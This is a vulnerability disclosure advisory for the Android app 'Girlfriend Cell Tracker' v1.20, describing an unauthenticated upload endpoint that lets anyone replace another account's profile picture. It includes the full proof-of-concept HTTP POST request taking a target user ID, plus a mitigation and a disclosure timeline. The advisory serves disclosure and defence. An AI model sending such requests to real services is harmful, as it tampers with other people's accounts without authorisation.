SIK-2017-051

Title:

Profile picture of any account can be changed unauthorized in Girlfriend Cell Tracker App

Report ID

SIK-2017-051

Summary:

Vendor: SoftSquare InfoSoft
Product: Girlfriend Cell Tracker (Package-Name: com.omrup.cell.tracker)
Affected Version: v1.20
Severity: Low
Short summary: With only the userid (which can be leaked with SIK-2017-047) the profile pic can be changed of that account.

Details:

By sending the POST request

POST /****/api/upload_file.php HTTP/1.1
Content-Type: multipart/form-data; boundary=77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Length: 16468
Host: omsquare.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.4.0

--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="file"; filename="cropped1506604715.jpg"
Content-Type: text/csv
Content-Length: 16134

[PICTURE DATA IN BINARY]

--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="id"
Content-Length: 15

149865712068829   [USER ID TO CHANGE PROFILE PICTURE FOR]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2--

the profile picture can be uploaded and it will be set to the profile of the given user id.

All User-IDs can be extracted via SIK-2017-047.

Workaround

None.

Suggested Mitigation

Use some kind of authentication when uploading the profile pictures.

Timeline

2017-08-23: Vulnerability discovered
2017-08-29: First Email sent to developer
2018-08-11: Published